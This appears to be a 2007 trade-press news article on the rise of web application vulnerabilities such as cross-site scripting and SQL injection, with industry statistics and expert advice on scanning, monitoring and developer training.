News Stay informed about the latest enterprise technology news and product updates.

Web apps remain a trouble spot

Cross-site scripting and code injection have become even bigger development issues than buffer overflows. George Hulme reports the new threats to your Web applications.

After more than a decade of organizations focusing on locking down network perimeters, endpoint devices and email, Web applications have surfaced as the new attack flashpoint. Last year was a bad year for Web application security--whether it was overseas hackers reportedly accessing credit card information from thousands of transactions on the state of Rhode Island's Web site, or universities inadvertently spilling sensitive student information, including Social Security numbers, onto the Internet.

"Cross-site scripting is all over the place; it's like the plague right now."
Jeremiah Grossman, 
WhiteHat's chief technology officer
Statistics back this up. Symantec said in its most recent Internet Security Threat Report that Web vulnerabilities constituted 69 percent of 2,249 new vulnerabilities the company documented for the first half of 2006, with 78 percent of "easily exploitable" vulnerabilities residing within Web applications. Mitre Corp.'s September tally of publicly disclosed vulnerabilities mirror those findings, with cross-site scripting vulnerabilities surpassing buffer overflows as the most reported vulnerability. Four of the top five vulnerabilities were within Web applications, development platforms, or databases often directly exposed to the Internet. Some other common and devastating problems include SQL injection vulnerabilities, directory transversal attacks, and PHP includes.

Experts warn that Web application attacks are going to escalate before security catches up. Johannes Ullrich, SANS Institute chief research officer, predicts 2007 will be peppered with major Web application-related security incidents where criminals overtake trusted Web sites to steal financial or other sensitive information.

The threats are changing. Chatty spyware and rapidly spreading worms have given way to more clandestine exploits designed to silently pilfer information from Web applications, or change prices on e-commerce sites. Then there's malware that silently infects Web servers and site visitors.

"The attackers have learned that highly aggressive scanning and propagation techniques don't yield more exploited hosts in the end," said Ullrich. "They'd rather infect a popular Web server with browser exploits and then quietly infect visitors to the site."

What are organizations doing about it? Not enough, said Caleb Sima, founder and chief technology officer at Web application vulnerability scanner provider SPI Dynamics. "It's a bigger problem than many enterprises assume," he said. "Despite years of Web applications being targeted, enterprises and other organizations still aren't doing enough to secure their Web sites and apps."

RSA Conference 2007

Can't make it to the show? staff members are on the RSA floor, on hand to deliver the latest RSA Conference 2007 news and updates.
That assertion is backed by WhiteHat Security's Web Application Security Risk Report, which said eight out of 10 Web sites have vulnerabilities that place them at significant risk of attack. The report, which monitors hundreds of sites each month, found that cross-site scripting, information leakage, and predictable resource location are the top three vulnerabilities. "We've found cross-site scripting in seven out of the 10 Web sites we monitor, and predictable resource location in one out of four," said Jeremiah Grossman, WhiteHat's chief technology officer. "Cross-site scripting is all over the place; it's like the plague right now."

There's no easy way to turn around the problem, Ullrich said. For Web applications and servers already deployed, the best defense is thorough scanning with a Web application security scanner. Also, watch logs and deploy intrusion detection sensors. "When it comes to custom applications, many attacks and exploits are not straightforward, and they often need multiple attempts to succeed. This is something IDS will pick up," Ullrich said.

In fact, most experts advise periodic scanning with multiple tools designed to identify vulnerabilities at the network layer, application, and misconfigurations. "Even then, you don't always get everything. Some errors involving [business logic] require human analysis," said WhiteHat's Grossman.

Amol Sarwate, vulnerability lab manager at Qualys, said continuous awareness training may be one of the best defenses. "The development and attacker techniques are always evolving, changing. That's why new and even experienced developers need to stay informed, and get educated about secure development," he said. Sarwate points to the Open Web Application Security Project (OWASP) as a good starting point for learning about Web application security.

John Pescatore, security analyst at Gartner, is surprised about some facets of the spate of Web application vulnerabilities. "We had many of these problems in the early days of the Internet," he said. "It's amazing how we are repeating the same old mistakes, and the bad guys will inevitably play around with, and take advantage, of them."

<< Return to our special coverage of RSA Conference 2007

Dig Deeper on Web application and API security best practices

Start the conversation

Send me notifications when other members comment.

Please create a username to comment.